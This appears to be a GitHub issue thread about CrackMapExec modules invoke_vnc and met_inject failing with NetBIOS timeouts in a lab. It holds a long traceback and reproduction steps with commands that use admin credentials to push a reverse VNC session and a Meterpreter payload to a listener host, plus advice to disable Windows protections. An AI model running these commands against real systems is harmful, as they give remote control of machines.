Whenever I use invoke_vnc or met_inject, keep getting the same error message and fails (5.1.1dev)

[TheNullSec]

So I've tried using to modules now, the met_inject module and the invoke_vnc module, however with both I keep getting the same error and the module fails to work. With these modules you expect to get a meterpreter shell and a VNC viewer remote connection respectively.

CME VERSION: 5.1.1dev (3TH@n) INSTALL METHOD: zip download (https://github.com/byt3bl33d3r/CrackMapExec/releases/tag/v5.1.1dev) KALI OS VERSION: 2020.1 Windows Machine OS Version: 10.0.19041 N/A Build 19041

**Traceback (most recent call last):
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/nmb.py", line 979, in non_polling_read
    received = self._sock.recv(bytes_left)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/gevent/_socket3.py", line 454, in recv
    self._wait(self._read_event)
  File "src/gevent/_hub_primitives.py", line 317, in gevent._gevent_c_hub_primitives.wait_on_socket
  File "src/gevent/_hub_primitives.py", line 322, in gevent._gevent_c_hub_primitives.wait_on_socket
  File "src/gevent/_hub_primitives.py", line 313, in gevent._gevent_c_hub_primitives._primitive_wait
  File "src/gevent/_hub_primitives.py", line 314, in gevent._gevent_c_hub_primitives._primitive_wait
  File "src/gevent/_hub_primitives.py", line 46, in gevent._gevent_c_hub_primitives.WaitOperationsGreenlet.wait
  File "src/gevent/_hub_primitives.py", line 46, in gevent._gevent_c_hub_primitives.WaitOperationsGreenlet.wait
  File "src/gevent/_hub_primitives.py", line 55, in gevent._gevent_c_hub_primitives.WaitOperationsGreenlet.wait
  File "src/gevent/_waiter.py", line 151, in gevent._gevent_c_waiter.Waiter.get
  File "src/gevent/_greenlet_primitives.py", line 61, in gevent._gevent_c_greenlet_primitives.SwitchOutGreenletWithLoop.switch
  File "src/gevent/_greenlet_primitives.py", line 61, in gevent._gevent_c_greenlet_primitives.SwitchOutGreenletWithLoop.switch
  File "src/gevent/_greenlet_primitives.py", line 65, in gevent._gevent_c_greenlet_primitives.SwitchOutGreenletWithLoop.switch
  File "src/gevent/_gevent_c_greenlet_primitives.pxd", line 35, in gevent._gevent_c_greenlet_primitives._greenlet_switch
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "src/gevent/greenlet.py", line 854, in gevent._gevent_cgreenlet.Greenlet.run
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/protocols/smb.py", line 121, in __init__
    connection.__init__(self, args, db, host)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/connection.py", line 47, in __init__
    self.proto_flow()
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/connection.py", line 84, in proto_flow
    self.call_modules()
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/connection.py", line 114, in call_modules
    self.module.on_admin_login(context, self)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/modules/invoke_vnc.py", line 51, in on_admin_login
    connection.ps_execute(launcher)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/connection.py", line 18, in _decorator
    return func(self, *args, **kwargs)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/protocols/smb.py", line 524, in ps_execute
    self.execute(create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/connection.py", line 18, in _decorator
    return func(self, *args, **kwargs)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/protocols/smb.py", line 95, in _decorator
    output = func(self, *args, **kwargs)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/protocols/smb.py", line 503, in execute
    output = u'{}'.format(exec_method.execute(payload, get_output).strip())
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/protocols/smb/atexec.py", line 44, in execute
    self.execute_handler(command)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/protocols/smb/atexec.py", line 63, in execute_handler
    self.doStuff(data)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/cme/protocols/smb/atexec.py", line 144, in doStuff
    tsch.hSchRpcRegisterTask(dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/dcerpc/v5/tsch.py", line 673, in hSchRpcRegisterTask
    return dce.request(request)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/dcerpc/v5/rpcrt.py", line 855, in request
    self.call(request.opnum, request, uuid)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/dcerpc/v5/rpcrt.py", line 844, in call
    return self.send(DCERPC_RawCall(function, body.getData(), uuid))
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/dcerpc/v5/rpcrt.py", line 1295, in send
    self._transport_send(data, forceWriteAndx = 1, forceRecv =data['flags'] & PFC_LAST_FRAG)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/dcerpc/v5/rpcrt.py", line 1234, in _transport_send
    self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/dcerpc/v5/transport.py", line 435, in send
    self.__smb_connection.writeFile(self.__tid, self.__handle, data)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/smbconnection.py", line 565, in writeFile
    return self._SMBConnection.writeFile(treeId, fileId, data, offset)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/smb3.py", line 1583, in writeFile
    written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/smb3.py", line 1287, in write
    ans = self.recvSMB(packetID)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/smb3.py", line 436, in recvSMB
    data = self._NetBIOSSession.recv_packet(self._timeout)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/nmb.py", line 914, in recv_packet
    data = self.__read(timeout)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/nmb.py", line 997, in __read
    data = self.read_function(4, timeout)
  File "/root/.shiv/cme_c02f19e8494330cae71f62f5510cef5dac8ec2460e9568c5338a49be2449c683/site-packages/impacket/nmb.py", line 981, in non_polling_read
    raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
2020-10-02T10:48:35Z <Greenlet at 0x7f7c54234150: smb(Namespace(aesKey=None, clear_obfscripts=False, con, <protocol.database object at 0x7f7c54447fa0>, '192.168.106.163')> failed with NetBIOSTimeout**

Steps to reproduce the behavior for the invoke_vnc module:

• vncviewer -listen

• python3 cme smb 192.168.106.163 -u {valid local admin username} -p {valid password} -M invoke_vnc -o PORT=5500 PASSWORD=pass

• I have a Windows machine at 192.168.106.163 with antivirus and firewall turned off to ensure that it's not the issue.

Steps to reproduce the behaviour for met_inject (I tried many variations such as using different metasploit payloads and SSL options but gave the same error each time):

• set up metasploit component:

• python3 cme smb 192.168.106.163 -u {valid local admin username} -p {valid password} -M met_inject -o SRVHOST=192.168.106.214 SRVPORT=8080 RAND=82ymOh33LC SSL=http

[mpgn]

Hello,

Does the antivirus is disabled on the client side ?

[TheNullSec]

Hey, yeah like I said I turned off the firewall and the anti-virus so i don't think it's that. Shouldn't be anything blocking it on the Kali side.

[mpgn]

Try to disable everything

[TheNullSec]

Okay I disabled the 'Tamper Protection' on the Windows side and now a connection seems to be made when I try invoke_vnc module, however I now get the following error:

Any suggestions?

[mpgn]

Linked to https://github.com/byt3bl33d3r/CrackMapExec/issues/223

[mpgn]

module removed